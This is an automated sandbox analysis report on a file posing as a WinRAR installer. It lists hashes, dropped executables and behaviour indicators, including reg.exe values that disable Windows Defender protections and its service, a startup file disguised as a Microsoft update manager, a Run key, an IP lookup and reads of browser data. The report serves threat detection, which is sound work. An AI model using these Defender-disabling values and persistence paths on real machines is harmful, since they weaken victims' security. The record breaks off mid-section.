Analysis
-
max time kernel
1775s -
max time network
1794s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
04-12-2022 20:15
Static task
static1
Behavioral task
behavioral1
Sample
winrar-x64-611.exe
Resource
win10v2004-20220901-en
General
-
Target
winrar-x64-611.exe
-
Size
3.3MB
-
MD5
8a6217d94e1bcbabdd1dfcdcaa83d1b3
-
SHA1
99b81b01f277540f38ea3e96c9c6dc2a57dfeb92
-
SHA256
3023edb4fc3f7c2ebad157b182b62848423f6fa20d180b0df689cbb503a49684
-
SHA512
a8f6f6fdfa9d754a577b7dd885a938fb9149f113baa2afb6352df622cdb73242175a06cd567e971fd3de93a126ba05b78178d5d512720d8fdb87ececce2cbf54
-
SSDEEP
98304:mZjOBfKqY3fhMBexKTvsCHBviBh2GB8y0mb5:mZZ7fhMB2ovFNiKGhJ
Malware Config
Extracted
C:\Program Files\WinRAR\Rar.txt
Extracted
C:\Program Files\WinRAR\WhatsNew.txt
https
http
http://weirdsgn.com
http://icondesignlab.com
https://rarlab.com/themes/WinRAR_Classic_48x36.theme.rar
Signatures
-
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Modifies system executable filetype association 2 TTPs 8 IoCs
Processes:
uninstall.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ uninstall.exe -
Nirsoft 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2736-247-0x0000000000400000-0x000000000045B000-memory.dmp Nirsoft behavioral1/memory/4268-249-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft -
Executes dropped EXE 21 IoCs
Processes:
uninstall.exeWinRAR.exeItroublveTSC.exeItroublveTSC.exeItroublveTSC.exeItroublveTSC.exeredengine.exeRtkBtManServ.exesnuvcdsm.exewinhlp32.exesplwow64.exehh.exexwizard.exeWinRAR.exeWinRAR.exeWinRAR.exeChromeRecovery.exeWinRAR.exeWinRAR.exeWinRAR.exeWinRAR.exepid process 2404 uninstall.exe 784 WinRAR.exe 1240 ItroublveTSC.exe 2308 ItroublveTSC.exe 2980 ItroublveTSC.exe 3996 ItroublveTSC.exe 180 redengine.exe 3676 RtkBtManServ.exe 4504 snuvcdsm.exe 2736 winhlp32.exe 4268 splwow64.exe 4848 hh.exe 4424 xwizard.exe 4916 WinRAR.exe 2176 WinRAR.exe 2200 WinRAR.exe 3120 ChromeRecovery.exe 2532 WinRAR.exe 2196 WinRAR.exe 1184 WinRAR.exe 4728 WinRAR.exe -
Registers COM server for autorun 1 TTPs 3 IoCs
Processes:
uninstall.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext.dll" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ThreadingModel = "Apartment" uninstall.exe -
Processes:
resource yara_rule behavioral1/memory/2736-247-0x0000000000400000-0x000000000045B000-memory.dmp upx behavioral1/memory/4268-249-0x0000000000400000-0x000000000041B000-memory.dmp upx -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WinRAR.exeItroublveTSC.exeWScript.exeredengine.exeRtkBtManServ.exeWScript.exewinrar-x64-611.exeWScript.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WinRAR.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation ItroublveTSC.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation redengine.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation RtkBtManServ.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation winrar-x64-611.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
redengine.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager5372207.exe redengine.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager5372207.exe redengine.exe -
Loads dropped DLL 7 IoCs
Processes:
MSBuild.exepid process 2440 2440 4864 MSBuild.exe 4864 MSBuild.exe 4864 MSBuild.exe 4864 MSBuild.exe 2440 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 232 api64.ipify.org 233 api64.ipify.org -
Drops file in Program Files directory 64 IoCs
Processes:
winrar-x64-611.exeuninstall.exechrome.exeelevation_service.exedescription ioc process File created C:\Program Files\WinRAR\WhatsNew.txt winrar-x64-611.exe File created C:\Program Files\WinRAR\UnRAR.exe winrar-x64-611.exe File opened for modification C:\Program Files\WinRAR\Descript.ion winrar-x64-611.exe File created C:\Program Files\WinRAR\rarnew.dat uninstall.exe File opened for modification C:\Program Files\WinRAR\RarExtInstaller.exe winrar-x64-611.exe File opened for modification C:\Program Files\WinRAR\Default.SFX winrar-x64-611.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\dotnet_library_license.txt chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\ref\MonoAndroid10\_._ chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\ref\netstandard1.3\it\System.IO.Compression.ZipFile.xml chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\Properties\Resources.resx chrome.exe File opened for modification C:\Program Files\WinRAR\Rar.txt winrar-x64-611.exe File created C:\Program Files\WinRAR\WinCon64.SFX winrar-x64-611.exe File created C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-64.png winrar-x64-611.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\lib\xamarinmac20\_._ chrome.exe File opened for modification C:\Program Files\WinRAR\RarExt.dll winrar-x64-611.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\Digitallity.cs chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\o.crproj chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\lib\xamarinwatchos10\_._ chrome.exe File created C:\Program Files\WinRAR\Default.SFX winrar-x64-611.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\Binaries\RtkBtManServ.exe chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\obf\Confuser.Protections.dll chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\obf\Teen.dll chrome.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4872_1715539824\manifest.json elevation_service.exe File created C:\Program Files\WinRAR\RarExtInstaller.exe winrar-x64-611.exe File opened for modification C:\Program Files\WinRAR\UnRAR.exe winrar-x64-611.exe File opened for modification C:\Program Files\WinRAR\WinCon.SFX winrar-x64-611.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\obf\CLI.exe chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\obf\Confuser.Renamer.dll chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\lib\MonoAndroid10\_._ chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\ThirdPartyNotices.txt chrome.exe File created C:\Program Files\WinRAR\7zxa.dll winrar-x64-611.exe File created C:\Program Files\WinRAR\zipnew.dat uninstall.exe File created C:\Program Files\WinRAR\WinCon.SFX winrar-x64-611.exe File created C:\Program Files\WinRAR\Zip.SFX winrar-x64-611.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\.signature.p7s chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\ref\netstandard1.3\System.IO.Compression.ZipFile.dll chrome.exe File opened for modification C:\Program Files\WinRAR\Resources.pri winrar-x64-611.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\ref\MonoTouch10\_._ chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\ref\netstandard1.3\zh-hant\System.IO.Compression.ZipFile.xml chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\Properties\AssemblyInfo.cs chrome.exe File opened for modification C:\Program Files\WinRAR\Rar.exe winrar-x64-611.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\Properties\Resources.Designer.cs chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\Properties\Settings.Designer.cs chrome.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4872_1715539824\ChromeRecoveryCRX.crx elevation_service.exe File opened for modification C:\Program Files\WinRAR\WhatsNew.txt winrar-x64-611.exe File opened for modification C:\Program Files\WinRAR\Zip64.SFX winrar-x64-611.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\ItroublveTSC.exe chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\frmMain.cs chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\obf\Confuser.Runtime.dll chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\ref\netstandard1.3\ru\System.IO.Compression.ZipFile.xml chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\ref\xamarintvos10\_._ chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\ref\netstandard1.3\es\System.IO.Compression.ZipFile.xml chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\ref\netstandard1.3\zh-hans\System.IO.Compression.ZipFile.xml chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\System.IO.Compression.ZipFile.4.3.0.nupkg chrome.exe File created C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png winrar-x64-611.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\obf\Confuser.DynCipher.dll chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\lib\net46\System.IO.Compression.ZipFile.dll chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\ref\netstandard1.3\ja\System.IO.Compression.ZipFile.xml chrome.exe File created C:\Program Files\WinRAR\Rar.exe winrar-x64-611.exe File created C:\Program Files\WinRAR\Uninstall.exe winrar-x64-611.exe File opened for modification C:\Program Files\WinRAR\RarExt32.dll winrar-x64-611.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\packages\System.IO.Compression.ZipFile.4.3.0\lib\xamarinios10\_._ chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\bin\Program.cs chrome.exe File opened for modification C:\Program Files\WinRAR\ReadMe.txt winrar-x64-611.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
msedge.exechrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Processes:
WinRAR.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\IESettingSync WinRAR.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" WinRAR.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch WinRAR.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" WinRAR.exe -
Modifies registry class 64 IoCs
Processes:
uninstall.exechrome.exechrome.exeItroublveTSC.exeItroublveTSC.exeWinRAR.exeWinRAR.exeWinRAR.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.zst\ = "WinRAR" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command uninstall.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 02000000030000000100000000000000ffffffff chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r23 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r27\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bz\ = "WinRAR" uninstall.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000100000000000000ffffffff ItroublveTSC.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48" chrome.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lha\ = "WinRAR" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.tar uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Program Files\\WinRAR\\WinRAR.exe,0" uninstall.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} ItroublveTSC.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ WinRAR.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ WinRAR.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.arj\ = "WinRAR" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.tbz uninstall.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193" chrome.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r09 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r09\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r23\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ WinRAR.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.rar uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r12\ = "WinRAR" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r21 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lzh uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r01\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" ItroublveTSC.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193" chrome.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r07\ = "WinRAR" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r19 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command\ = "\"C:\\Program Files\\WinRAR\\WinRAR.exe\" \"%1\"" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command\ = "\"C:\\Program Files\\WinRAR\\WinRAR.exe\" \"%1\"" uninstall.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3\MRUListEx = ffffffff chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers uninstall.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" ItroublveTSC.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\NodeSlot = "4" ItroublveTSC.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ WinRAR.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.rar\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r29\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command\ = "\"C:\\Program Files\\WinRAR\\WinRAR.exe\" \"%1\"" uninstall.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff chrome.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ThreadingModel = "Apartment" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} uninstall.exe -
Suspicious behavior: EnumeratesProcesses 46 IoCs
Processes:
